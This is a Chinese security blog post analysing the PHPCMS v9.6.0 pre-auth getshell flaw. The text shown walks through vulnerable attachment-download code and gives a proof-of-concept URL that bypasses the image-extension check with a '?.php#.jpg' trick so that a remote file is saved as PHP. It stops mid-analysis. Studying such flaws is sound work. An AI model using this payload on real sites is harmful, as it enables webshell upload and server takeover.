<!DOCTYPE html>
<html lang=en>
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="google-site-verification" content="xBT4GhYoi5qRD5tr338pgPM5OWHHIDR6mNg1a3euekI" />
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta property="og:description" content="">
    <meta property="og:type" content="website">
    <meta name="description" content="">
    <meta name="keyword"  content="">
    <link rel="shortcut icon" href="/img/favicon.ico">

    <title>
        
        PHPCMS_V9.6.0 前台GETSHELL - undefined
        
    </title>

    <!-- Custom CSS -->
    
<link rel="stylesheet" href="/css/aircloud.css">

    
<link rel="stylesheet" href="/css/gitment.css">

    <!--<link rel="stylesheet" href="https://imsun.github.io/gitment/style/default.css">-->
    <link href="//at.alicdn.com/t/font_620856_28hi1hpxx24.css" rel="stylesheet" type="text/css">
    <!-- ga & ba script hoook -->
    <script></script>
<meta name="generator" content="Hexo 6.2.0"></head>

<body>

<div class="site-nav-toggle" id="site-nav-toggle">
    <button>
        <span class="btn-bar"></span>
        <span class="btn-bar"></span>
        <span class="btn-bar"></span>
    </button>
</div>

<div class="index-about">
    <i>  </i>
</div>

<div class="index-container">
    
    <div class="index-left">
        
<div class="nav" id="nav">
    <div class="avatar-name">
        <div class="avatar ">
            <img src="/img/avatar.jpeg" />
        </div>
        <div class="name">
            <i>seaii</i>
        </div>
    </div>
    <div class="contents" id="nav-content">
        <ul>
            <li >
                <a href="/">
                    <i class="iconfont icon-shouye1"></i>
                    <span>HOME</span>
                </a>
            </li>
            <li >
                <a href="/tags">
                    <i class="iconfont icon-biaoqian1"></i>
                    <span>TAGS</span>
                </a>
            </li>
            <li >
                <a href="/archives">
                    <i class="iconfont icon-guidang2"></i>
                    <span>ARCHIVES</span>
                </a>
            </li>
            <li >
                <a href="/collect/">
                    <i class="iconfont icon-shoucang1"></i>
                    <span>COLLECT</span>
                </a>
            </li>
            <li >
                <a href="/about/">
                    <i class="iconfont icon-guanyu2"></i>
                    <span>ABOUT</span>
                </a>
            </li>
            
        </ul>
    </div>
    
        <div id="toc" class="toc-article">
    <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#0x01%E5%89%8D%E8%A8%80"><span class="toc-text">0x01前言</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x02%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="toc-text">0x02漏洞分析</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x03%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-text">0x03漏洞利用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x04%E6%BC%8F%E6%B4%9E%E4%BF%AE%E5%A4%8D"><span class="toc-text">0x04漏洞修复</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x05%E6%80%BB%E7%BB%93"><span class="toc-text">0x05总结</span></a></li></ol>
</div>
    
</div>


<div class="search-field" id="search-field">
    <div class="search-bg" id="search-bg"></div>
    <div class="search-container">
        <div class="search-input">
            <span id="esc-search"> <i class="icon-fanhui iconfont"></i></span>
            <input id="search-input"/>
            <span id="begin-search">search</span>
        </div>
        <div class="search-result-container" id="search-result-container">

        </div>
    </div>
</div>

        <div class="index-about-mobile">
            <i>  </i>
        </div>
    </div>
    
    <div class="index-middle">
        <!-- Main Content -->
        


<div class="post-container">
    <div class="post-title">
        PHPCMS_V9.6.0 前台GETSHELL
    </div>

    <div class="post-meta">
        <span class="attr">Post：<span>2017-04-23 16:14:00</span></span>
        
        <span class="attr">Tags：/
        
        <a class="tag" href="/tags/#审计" title="审计">审计</a>
        <span>/</span>
        
        <a class="tag" href="/tags/#phpcms" title="phpcms">phpcms</a>
        <span>/</span>
        
        <a class="tag" href="/tags/#getshell" title="getshell">getshell</a>
        <span>/</span>
        
        
        </span>
        <span class="attr">Visit：<span id="busuanzi_value_page_pv"></span>
</span>
</span>
    </div>
    <div class="post-content ">
        <h3 id="0x01前言"><a href="#0x01前言" class="headerlink" title="0x01前言"></a>0x01前言</h3><p>这个漏洞出来也有一段时间了，成天不知道瞎忙些什么，一直也没静下心来研究一下。。。自己水平也是菜，一直玩人家反复玩了不知道多少遍的东西。只能多学点挖洞姿势，希望自己以后也能挖到一个0day（有生之年系列。。。。）</p>
<span id="more"></span>


<h3 id="0x02漏洞分析"><a href="#0x02漏洞分析" class="headerlink" title="0x02漏洞分析"></a>0x02漏洞分析</h3><p>漏洞出现在<code>/phpcms/libs/classes/attachment.class.php</code>中的download函数中，代码如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line">   <span class="function"><span class="keyword">function</span> <span class="title">download</span>(<span class="params"><span class="variable">$field</span>, <span class="variable">$value</span>,<span class="variable">$watermark</span> = <span class="string">&#x27;0&#x27;</span>,<span class="variable">$ext</span> = <span class="string">&#x27;gif|jpg|jpeg|bmp|png&#x27;</span>, <span class="variable">$absurl</span> = <span class="string">&#x27;&#x27;</span>, <span class="variable">$basehref</span> = <span class="string">&#x27;&#x27;</span></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">global</span> <span class="variable">$image_d</span>;</span><br><span class="line">	<span class="variable language_">$this</span>-&gt;att_db = pc_base::<span class="title function_ invoke__">load_model</span>(<span class="string">&#x27;attachment_model&#x27;</span>);</span><br><span class="line">	<span class="variable">$upload_url</span> = pc_base::<span class="title function_ invoke__">load_config</span>(<span class="string">&#x27;system&#x27;</span>,<span class="string">&#x27;upload_url&#x27;</span>);</span><br><span class="line">	<span class="variable language_">$this</span>-&gt;field = <span class="variable">$field</span>;</span><br><span class="line">	<span class="variable">$dir</span> = <span class="title function_ invoke__">date</span>(<span class="string">&#x27;Y/md/&#x27;</span>);</span><br><span class="line">	<span class="variable">$uploadpath</span> = <span class="variable">$upload_url</span>.<span class="variable">$dir</span>;</span><br><span class="line">	<span class="variable">$uploaddir</span> = <span class="variable language_">$this</span>-&gt;upload_root.<span class="variable">$dir</span>;</span><br><span class="line">	<span class="variable">$string</span> = <span class="title function_ invoke__">new_stripslashes</span>(<span class="variable">$value</span>);</span><br><span class="line">	<span class="keyword">if</span>(!<span class="title function_ invoke__">preg_match_all</span>(<span class="string">&quot;/(href|src)=([\&quot;|&#x27;]?)([^ \&quot;&#x27;&gt;]+\.(<span class="subst">$ext</span>))\\2/i&quot;</span>, <span class="variable">$string</span>, <span class="variable">$matches</span>)) <span class="keyword">return</span> <span class="variable">$value</span>;</span><br><span class="line">	<span class="variable">$remotefileurls</span> = <span class="keyword">array</span>();</span><br><span class="line">	<span class="keyword">foreach</span>(<span class="variable">$matches</span>[<span class="number">3</span>] <span class="keyword">as</span> <span class="variable">$matche</span>)</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="keyword">if</span>(<span class="title function_ invoke__">strpos</span>(<span class="variable">$matche</span>, <span class="string">&#x27;://&#x27;</span>) === <span class="literal">false</span>) <span class="keyword">continue</span>;</span><br><span class="line">		<span class="title function_ invoke__">dir_create</span>(<span class="variable">$uploaddir</span>);</span><br><span class="line">		<span class="variable">$remotefileurls</span>[<span class="variable">$matche</span>] = <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">fillurl</span>(<span class="variable">$matche</span>, <span class="variable">$absurl</span>, <span class="variable">$basehref</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">unset</span>(<span class="variable">$matches</span>, <span class="variable">$string</span>);</span><br><span class="line">	<span class="variable">$remotefileurls</span> = <span class="title function_ invoke__">array_unique</span>(<span class="variable">$remotefileurls</span>);</span><br><span class="line">	<span class="variable">$oldpath</span> = <span class="variable">$newpath</span> = <span class="keyword">array</span>();</span><br><span class="line">	<span class="keyword">foreach</span>(<span class="variable">$remotefileurls</span> <span class="keyword">as</span> <span class="variable">$k</span>=&gt;<span class="variable">$file</span>) &#123;</span><br><span class="line">		<span class="keyword">if</span>(<span class="title function_ invoke__">strpos</span>(<span class="variable">$file</span>, <span class="string">&#x27;://&#x27;</span>) === <span class="literal">false</span> || <span class="title function_ invoke__">strpos</span>(<span class="variable">$file</span>, <span class="variable">$upload_url</span>) !== <span class="literal">false</span>) <span class="keyword">continue</span>;</span><br><span class="line">		<span class="variable">$filename</span> = <span class="title function_ invoke__">fileext</span>(<span class="variable">$file</span>);</span><br><span class="line">		<span class="variable">$file_name</span> = <span class="title function_ invoke__">basename</span>(<span class="variable">$file</span>);</span><br><span class="line">		<span class="variable">$filename</span> = <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">getname</span>(<span class="variable">$filename</span>);</span><br><span class="line"></span><br><span class="line">		<span class="variable">$newfile</span> = <span class="variable">$uploaddir</span>.<span class="variable">$filename</span>;</span><br><span class="line">		<span class="variable">$upload_func</span> = <span class="variable language_">$this</span>-&gt;upload_func;</span><br><span class="line">		<span class="keyword">if</span>(<span class="variable">$upload_func</span>(<span class="variable">$file</span>, <span class="variable">$newfile</span>)) &#123;</span><br><span class="line">			<span class="variable">$oldpath</span>[] = <span class="variable">$k</span>;</span><br><span class="line">			<span class="variable">$GLOBALS</span>[<span class="string">&#x27;downloadfiles&#x27;</span>][] = <span class="variable">$newpath</span>[] = <span class="variable">$uploadpath</span>.<span class="variable">$filename</span>;</span><br><span class="line">			@<span class="title function_ invoke__">chmod</span>(<span class="variable">$newfile</span>, <span class="number">0777</span>);</span><br><span class="line">			<span class="variable">$fileext</span> = <span class="title function_ invoke__">fileext</span>(<span class="variable">$filename</span>);</span><br><span class="line">			<span class="keyword">if</span>(<span class="variable">$watermark</span>)&#123;</span><br><span class="line">				<span class="title function_ invoke__">watermark</span>(<span class="variable">$newfile</span>, <span class="variable">$newfile</span>,<span class="variable">$this</span>-&gt;siteid);</span><br><span class="line">			&#125;</span><br><span class="line">			<span class="variable">$filepath</span> = <span class="variable">$dir</span>.<span class="variable">$filename</span>;</span><br><span class="line">			<span class="variable">$downloadedfile</span> = <span class="keyword">array</span>(<span class="string">&#x27;filename&#x27;</span>=&gt;<span class="variable">$filename</span>, <span class="string">&#x27;filepath&#x27;</span>=&gt;<span class="variable">$filepath</span>, <span class="string">&#x27;filesize&#x27;</span>=&gt;<span class="title function_ invoke__">filesize</span>(<span class="variable">$newfile</span>), <span class="string">&#x27;fileext&#x27;</span>=&gt;<span class="variable">$fileext</span>);</span><br><span class="line">			<span class="variable">$aid</span> = <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">add</span>(<span class="variable">$downloadedfile</span>);</span><br><span class="line">			<span class="variable language_">$this</span>-&gt;downloadedfiles[<span class="variable">$aid</span>] = <span class="variable">$filepath</span>;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">return</span> <span class="title function_ invoke__">str_replace</span>(<span class="variable">$oldpath</span>, <span class="variable">$newpath</span>, <span class="variable">$value</span>);</span><br><span class="line">&#125;	</span><br></pre></td></tr></table></figure>
<p>简单分析一下函数的功能，函数形参$value获取到是远程文件的url，也是我们构造poc的地方。这段正则检测远程文件后缀名的合法性（gif|jpg|jpeg|bmp|png为合法），这里只是检测url的最后，所以我们可以用url有锚点（#）的特性来绕过。如果觉得难懂就拿出来输出一下匹配结果：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">	<span class="variable">$ext</span> = <span class="string">&#x27;jpg&#x27;</span>;</span><br><span class="line">	<span class="variable">$string</span> = <span class="string">&#x27;src=http://192.168.31.131/test.txt?.php#.jpg&#x27;</span>;<span class="comment">//poc</span></span><br><span class="line">	<span class="title function_ invoke__">preg_match_all</span>(<span class="string">&quot;/(href|src)=([\&quot;|&#x27;]?)([^ \&quot;&#x27;&gt;]+\.(<span class="subst">$ext</span>))\\2/i&quot;</span>, <span class="variable">$string</span>, <span class="variable">$matches</span>);</span><br><span class="line">	<span class="title function_ invoke__">var_dump</span>(<span class="variable">$matches</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">array</span>(<span class="number">5</span>) &#123;</span><br><span class="line">  [<span class="number">0</span>]=&gt;</span><br><span class="line">  <span class="keyword">array</span>(<span class="number">1</span>) &#123;</span><br><span class="line">    [<span class="number">0</span>]=&gt;</span><br><span class="line">    <span class="keyword">string</span>(<span class="number">44</span>) <span class="string">&quot;src=http://192.168.31.131/test.txt?.php#.jpg&quot;</span></span><br><span class="line">  &#125;</span><br><span class="line">  [<span class="number">1</span>]=&gt;</span><br><span class="line">  <span class="keyword">array</span>(<span class="number">1</span>) &#123;</span><br><span class="line">    [<span class="number">0</span>]=&gt;</span><br><span class="line">    <span class="keyword">string</span>(<span class="number">3</span>) <span class="string">&quot;src&quot;</span></span><br><span class="line">  &#125;</span><br><span class="line">  [<span class="number">2</span>]=&gt;</span><br><span class="line">  <span class="keyword">array</span>(<span class="number">1</span>) &#123;</span><br><span class="line">    [<span class="number">0</span>]=&gt;</span><br><span class="line">    <span class="keyword">string</span>(<span class="number">0</span>) <span class="string">&quot;&quot;</span></span><br><span class="line">  &#125;</span><br><span class="line">  [<span class="number">3</span>]=&gt;</span><br><span class="line">  <span class="keyword">array</span>(<span class="number">1</span>) &#123;</span><br><span class="line">    [<span class="number">0</span>]=&gt;</span><br><span class="line">    <span class="keyword">string</span>(<span class="number">40</span>) <span class="string">&quot;http://192.168.31.131/test.txt?.php#.jpg&quot;</span></span><br><span class="line">  &#125;</span><br><span class="line">  [<span class="number">4</span>]=&gt;</span><br><span class="line">  <span class="keyword">array</span>(<span class="number">1</span>) &#123;</span><br><span class="line">    [<span class="number">0</span>]=&gt;</span><br><span class="line">    <span class="keyword">string</span>(<span class="number">3</span>) <span class="string">&quot;jpg&quot;</span></span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>很明显我们构造的poc绕过了正则的检测，否则输出结果就位空了。继续往下走，将src的值放入fillurl函数（与download函数在同一文件）中，继续跟下去：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">fillurl</span>(<span class="params"><span class="variable">$surl</span>, <span class="variable">$absurl</span>, <span class="variable">$basehref</span> = <span class="string">&#x27;&#x27;</span></span>) </span>&#123;</span><br><span class="line">		<span class="keyword">if</span>(<span class="variable">$basehref</span> != <span class="string">&#x27;&#x27;</span>) &#123;</span><br><span class="line">			<span class="variable">$preurl</span> = <span class="title function_ invoke__">strtolower</span>(<span class="title function_ invoke__">substr</span>(<span class="variable">$surl</span>,<span class="number">0</span>,<span class="number">6</span>));</span><br><span class="line">			<span class="keyword">if</span>(<span class="variable">$preurl</span>==<span class="string">&#x27;http://&#x27;</span> || <span class="variable">$preurl</span>==<span class="string">&#x27;ftp://&#x27;</span> ||<span class="variable">$preurl</span>==<span class="string">&#x27;mms://&#x27;</span> || <span class="variable">$preurl</span>==<span class="string">&#x27;rtsp://&#x27;</span> || <span class="variable">$preurl</span>==<span class="string">&#x27;thunde&#x27;</span> || <span class="variable">$preurl</span>==<span class="string">&#x27;emule://&#x27;</span>|| <span class="variable">$preurl</span>==<span class="string">&#x27;ed2k://&#x27;</span>)</span><br><span class="line">			<span class="keyword">return</span>  <span class="variable">$surl</span>;</span><br><span class="line">			<span class="keyword">else</span></span><br><span class="line">			<span class="keyword">return</span> <span class="variable">$basehref</span>.<span class="string">&#x27;/&#x27;</span>.<span class="variable">$surl</span>;</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="variable">$i</span> = <span class="number">0</span>;</span><br><span class="line">		<span class="variable">$dstr</span> = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">		<span class="variable">$pstr</span> = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">		<span class="variable">$okurl</span> = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">		<span class="variable">$pathStep</span> = <span class="number">0</span>;</span><br><span class="line">		<span class="variable">$surl</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$surl</span>);</span><br><span class="line">		<span class="keyword">if</span>(<span class="variable">$surl</span>==<span class="string">&#x27;&#x27;</span>) <span class="keyword">return</span> <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">		<span class="variable">$urls</span> = @<span class="title function_ invoke__">parse_url</span>(SITE_URL);</span><br><span class="line">		<span class="variable">$HomeUrl</span> = <span class="variable">$urls</span>[<span class="string">&#x27;host&#x27;</span>];</span><br><span class="line">		<span class="variable">$BaseUrlPath</span> = <span class="variable">$HomeUrl</span>.<span class="variable">$urls</span>[<span class="string">&#x27;path&#x27;</span>];</span><br><span class="line">		<span class="variable">$BaseUrlPath</span> = <span class="title function_ invoke__">preg_replace</span>(<span class="string">&quot;/\/([^\/]*)\.(.*)$/&quot;</span>,<span class="string">&#x27;/&#x27;</span>,<span class="variable">$BaseUrlPath</span>);</span><br><span class="line">		<span class="variable">$BaseUrlPath</span> = <span class="title function_ invoke__">preg_replace</span>(<span class="string">&quot;/\/$/&quot;</span>,<span class="string">&#x27;&#x27;</span>,<span class="variable">$BaseUrlPath</span>);</span><br><span class="line">		<span class="variable">$pos</span> = <span class="title function_ invoke__">strpos</span>(<span class="variable">$surl</span>,<span class="string">&#x27;#&#x27;</span>);</span><br><span class="line">		<span class="keyword">if</span>(<span class="variable">$pos</span>&gt;<span class="number">0</span>) <span class="variable">$surl</span> = <span class="title function_ invoke__">substr</span>(<span class="variable">$surl</span>,<span class="number">0</span>,<span class="variable">$pos</span>);</span><br><span class="line">		<span class="keyword">if</span>(<span class="variable">$surl</span>[<span class="number">0</span>]==<span class="string">&#x27;/&#x27;</span>) &#123;</span><br><span class="line">			<span class="variable">$okurl</span> = <span class="string">&#x27;http://&#x27;</span>.<span class="variable">$HomeUrl</span>.<span class="string">&#x27;/&#x27;</span>.<span class="variable">$surl</span>;</span><br><span class="line">		&#125; <span class="keyword">elseif</span>(<span class="variable">$surl</span>[<span class="number">0</span>] == <span class="string">&#x27;.&#x27;</span>) &#123;</span><br><span class="line">			<span class="keyword">if</span>(<span class="title function_ invoke__">strlen</span>(<span class="variable">$surl</span>)&lt;=<span class="number">2</span>) <span class="keyword">return</span> <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">			<span class="keyword">elseif</span>(<span class="variable">$surl</span>[<span class="number">0</span>]==<span class="string">&#x27;/&#x27;</span>) &#123;</span><br><span class="line">				<span class="variable">$okurl</span> = <span class="string">&#x27;http://&#x27;</span>.<span class="variable">$BaseUrlPath</span>.<span class="string">&#x27;/&#x27;</span>.<span class="title function_ invoke__">substr</span>(<span class="variable">$surl</span>,<span class="number">2</span>,<span class="title function_ invoke__">strlen</span>(<span class="variable">$surl</span>)-<span class="number">2</span>);</span><br><span class="line">			&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">				<span class="variable">$urls</span> = <span class="title function_ invoke__">explode</span>(<span class="string">&#x27;/&#x27;</span>,<span class="variable">$surl</span>);</span><br><span class="line">				<span class="keyword">foreach</span>(<span class="variable">$urls</span> <span class="keyword">as</span> <span class="variable">$u</span>) &#123;</span><br><span class="line">					<span class="keyword">if</span>(<span class="variable">$u</span>==<span class="string">&quot;..&quot;</span>) <span class="variable">$pathStep</span>++;</span><br><span class="line">					<span class="keyword">else</span> <span class="keyword">if</span>(<span class="variable">$i</span>&lt;<span class="title function_ invoke__">count</span>(<span class="variable">$urls</span>)-<span class="number">1</span>) <span class="variable">$dstr</span> .= <span class="variable">$urls</span>[<span class="variable">$i</span>].<span class="string">&#x27;/&#x27;</span>;</span><br><span class="line">					<span class="keyword">else</span> <span class="variable">$dstr</span> .= <span class="variable">$urls</span>[<span class="variable">$i</span>];</span><br><span class="line">					<span class="variable">$i</span>++;</span><br><span class="line">				&#125;</span><br><span class="line">				<span class="variable">$urls</span> = <span class="title function_ invoke__">explode</span>(<span class="string">&#x27;/&#x27;</span>, <span class="variable">$BaseUrlPath</span>);</span><br><span class="line">				<span class="keyword">if</span>(<span class="title function_ invoke__">count</span>(<span class="variable">$urls</span>) &lt;= <span class="variable">$pathStep</span>)</span><br><span class="line">				<span class="keyword">return</span> <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">				<span class="keyword">else</span> &#123;</span><br><span class="line">					<span class="variable">$pstr</span> = <span class="string">&#x27;http://&#x27;</span>;</span><br><span class="line">					<span class="keyword">for</span>(<span class="variable">$i</span>=<span class="number">0</span>;<span class="variable">$i</span>&lt;<span class="title function_ invoke__">count</span>(<span class="variable">$urls</span>)-<span class="variable">$pathStep</span>;<span class="variable">$i</span>++) &#123;</span><br><span class="line">						<span class="variable">$pstr</span> .= <span class="variable">$urls</span>[<span class="variable">$i</span>].<span class="string">&#x27;/&#x27;</span>;</span><br><span class="line">					&#125;</span><br><span class="line">					<span class="variable">$okurl</span> = <span class="variable">$pstr</span>.<span class="variable">$dstr</span>;</span><br><span class="line">				&#125;</span><br><span class="line">			&#125;</span><br><span class="line">		&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">			<span class="variable">$preurl</span> = <span class="title function_ invoke__">strtolower</span>(<span class="title function_ invoke__">substr</span>(<span class="variable">$surl</span>,<span class="number">0</span>,<span class="number">6</span>));</span><br><span class="line">			<span class="keyword">if</span>(<span class="title function_ invoke__">strlen</span>(<span class="variable">$surl</span>)&lt;<span class="number">7</span>)</span><br><span class="line">			<span class="variable">$okurl</span> = <span class="string">&#x27;http://&#x27;</span>.<span class="variable">$BaseUrlPath</span>.<span class="string">&#x27;/&#x27;</span>.<span class="variable">$surl</span>;</span><br><span class="line">			<span class="keyword">elseif</span>(<span class="variable">$preurl</span>==<span class="string">&quot;http:/&quot;</span>||<span class="variable">$preurl</span>==<span class="string">&#x27;ftp://&#x27;</span> ||<span class="variable">$preurl</span>==<span class="string">&#x27;mms://&#x27;</span> || <span class="variable">$preurl</span>==<span class="string">&quot;rtsp://&quot;</span> || <span class="variable">$preurl</span>==<span class="string">&#x27;thunde&#x27;</span> || <span class="variable">$preurl</span>==<span class="string">&#x27;emule:&#x27;</span>|| <span class="variable">$preurl</span>==<span class="string">&#x27;ed2k:/&#x27;</span>)</span><br><span class="line">			<span class="variable">$okurl</span> = <span class="variable">$surl</span>;</span><br><span class="line">			<span class="keyword">else</span></span><br><span class="line">			<span class="variable">$okurl</span> = <span class="string">&#x27;http://&#x27;</span>.<span class="variable">$BaseUrlPath</span>.<span class="string">&#x27;/&#x27;</span>.<span class="variable">$surl</span>;</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="variable">$preurl</span> = <span class="title function_ invoke__">strtolower</span>(<span class="title function_ invoke__">substr</span>(<span class="variable">$okurl</span>,<span class="number">0</span>,<span class="number">6</span>));</span><br><span class="line">		<span class="keyword">if</span>(<span class="variable">$preurl</span>==<span class="string">&#x27;ftp://&#x27;</span> || <span class="variable">$preurl</span>==<span class="string">&#x27;mms://&#x27;</span> || <span class="variable">$preurl</span>==<span class="string">&#x27;rtsp://&#x27;</span> || <span class="variable">$preurl</span>==<span class="string">&#x27;thunde&#x27;</span> || <span class="variable">$preurl</span>==<span class="string">&#x27;emule:&#x27;</span>|| <span class="variable">$preurl</span>==<span class="string">&#x27;ed2k:/&#x27;</span>) &#123;</span><br><span class="line">			<span class="keyword">return</span> <span class="variable">$okurl</span>;</span><br><span class="line">		&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">			<span class="variable">$okurl</span> = <span class="title function_ invoke__">preg_replace</span>(<span class="string">&#x27;/^(http:\/\/)/i&#x27;</span>,<span class="string">&#x27;&#x27;</span>,<span class="variable">$okurl</span>);</span><br><span class="line">			<span class="variable">$okurl</span> = <span class="title function_ invoke__">preg_replace</span>(<span class="string">&#x27;/\/&#123;1,&#125;/i&#x27;</span>,<span class="string">&#x27;/&#x27;</span>,<span class="variable">$okurl</span>);</span><br><span class="line">			<span class="keyword">return</span> <span class="string">&#x27;http://&#x27;</span>.<span class="variable">$okurl</span>;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure>
<p>虽然这个函数写了一大坨，但是功能只有一个，就是把url的锚点去掉。回到download函数，此时取到的$remotefileurl的值为array(‘<a target="_blank" rel="noopener" href="http://192.168.31.131/test.txt?.php#.jpg&#39;">http://192.168.31.131/test.txt?.php#.jpg&#39;</a> &#x3D;&gt; ‘<a target="_blank" rel="noopener" href="http://192.168.31.131/test.txt?.php&#39;)%EF%BC%8C%E7%84%B6%E5%90%8E%E7%BB%8F%E8%BF%87%E4%BA%86fileext%E5%87%BD%E6%95%B0%EF%BC%9A">http://192.168.31.131/test.txt?.php&#39;)，然后经过了fileext函数：</a></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">fileext</span>(<span class="params"><span class="variable">$filename</span></span>) </span>&#123;</span><br><span class="line">	<span class="keyword">return</span> <span class="title function_ invoke__">strtolower</span>(<span class="title function_ invoke__">trim</span>(<span class="title function_ invoke__">substr</span>(<span class="title function_ invoke__">strrchr</span>(<span class="variable">$filename</span>, <span class="string">&#x27;.&#x27;</span>), <span class="number">1</span>, <span class="number">10</span>)));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这里要说一说strrchr函数，这个php内置函数是<code>查找字符串在另一个字符串中最后一次出现的位置，并返回从该位置到字符串结尾的所有字符</code>，便于理解还是贴出测试代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="variable">$filename</span> = <span class="string">&#x27;text.txt?.php&#x27;</span>;</span><br><span class="line">    <span class="keyword">echo</span> <span class="title function_ invoke__">strrchr</span>(<span class="variable">$filename</span>, <span class="string">&#x27;.&#x27;</span>) .<span class="string">&quot;\n&quot;</span>;</span><br><span class="line">    <span class="variable">$ext</span> = <span class="title function_ invoke__">substr</span>(<span class="title function_ invoke__">strrchr</span>(<span class="variable">$filename</span>, <span class="string">&#x27;.&#x27;</span>), <span class="number">1</span>, <span class="number">10</span>);</span><br><span class="line">    <span class="keyword">echo</span> <span class="variable">$ext</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br><span class="line">.php</span><br><span 